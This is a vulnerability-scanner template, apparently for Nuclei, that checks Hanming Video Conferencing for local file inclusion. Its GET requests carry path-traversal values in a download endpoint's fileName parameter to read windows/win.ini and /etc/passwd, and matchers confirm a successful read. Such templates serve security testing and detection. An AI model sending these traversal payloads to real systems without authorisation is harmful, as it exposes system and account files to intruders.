41 lines
1.2 KiB
YAML
41 lines
1.2 KiB
YAML
id: hanming-lfr
|
|
|
|
info:
|
|
name: Hanming Video Conferencing - Local File Inclusion
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: Hanming Video Conferencing is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/F-M21PT0xn9QOuwoC8llKA
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 2
|
|
tags: lfr,hanming,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini"
|
|
- "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
|
|
# digest: 4a0a0047304502206d750498f3b968a34034d66ff85589dd13a742b5e6f76bd36e279f4e58d9ddb4022100825c38690aca378b424fd264cbc6597f13347ff5c890b4936cf5fe4b2875e636:922c64590222798bb761d5b6d8e72950
|